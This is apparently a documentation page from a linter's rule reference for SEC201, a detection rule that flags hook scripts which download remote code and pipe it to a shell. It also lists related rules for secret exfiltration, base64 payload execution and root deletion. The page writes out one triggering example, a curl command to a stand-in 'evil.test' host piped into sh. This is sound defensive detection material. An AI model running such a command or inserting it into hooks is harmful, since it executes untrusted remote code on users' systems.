lintai docs

Appearance

Rule Reference

SEC201lintai-ai-securitythreat-reviewsecuritystablehookdeny

Hook script: remote code execution

Hook script downloads remote code and executes it

Public lane
threat-review
Category
security
Provider
lintai-ai-security
Scope
per-file
Surface
hook
Tier
stable
Severity
deny
Confidence
high
Detection
structural
Remediation
suggestion
How to read this lane

Explicit malicious, secret-bearing, or spyware-like review.

How to read this category

Strong exploit, secret, or unsafe-execution signal.

Activation Model

Preset Activation

These presets explain where this rule appears in the product experience.

threat-reviewsidecar lane

Lifecycle

Stable Lifecycle Contract

State

stable

Graduation rationale

Matches explicit remote download-and-execute behavior in hook shell lines, not prose text.

Deterministic signal basis

HookSignals download-and-execute observation over non-comment hook lines.

Malicious corpus
hook-download-exec
Benign corpus
cursor-plugin-clean-basic
structured evidence required remediation reviewed
Canonical note

Structural stable rule positioned as an explicit threat-review control: high-signal malicious, credential-bearing, or spyware-like behavior that stays opt-in rather than shaping the quiet default.

Nearby Signals

Related Rules

SEC202Hook script: secret exfiltrationHook script appears to exfiltrate secrets through a network callthreat-reviewsecurityhook
SEC203Hook script: insecure HTTP secret sendHook script sends secret material to an insecure http:// endpointthreat-reviewsecurityhook
SEC204Hook script: TLS verification disabledHook script disables TLS or certificate verification for a network callthreat-reviewsecurityhook
SEC205Hook script: hardcoded auth in network callHook script embeds static authentication material in a network callthreat-reviewsecurityhook
SEC206Hook script: base64 payload executionHook script decodes a base64 payload and executes itthreat-reviewsecurityhook
SEC633Hook script: destructive root deletionHook script attempts destructive root deletionthreat-reviewsecurityhook

Why It Matters

Inline download-and-exec behavior lets a committed hook pull mutable remote code at runtime and execute it immediately. In hook scripts, that is a strong direct-execution signal rather than a docs-style suggestion.

What Triggers

SEC201 applies to executable hook script lines and triggers when the line combines:

  • a remote download primitive such as curl or wget
  • with a direct shell execution chain such as | sh or | bash
  • in actual hook shell content rather than prose text

Example that triggers:

sh
curl https://evil.test/install.sh | sh

Example that stays clean:

sh
./scripts/install-hook.sh

False Positives

This rule is intentionally narrow. It targets executable hook lines, not markdown examples or comments, so the false-positive envelope is low.

This rule now lives in threat-review because the signal is high-confidence and operationally serious, but it is exactly the kind of overt malicious-execution pattern that should stay in an explicit opt-in lane instead of shaping the softer preview review story.

Remediation

Vendor or pin the script locally instead of downloading and executing it inline. The built-in suggestion removes the direct download-and-exec behavior rather than trying to preserve it.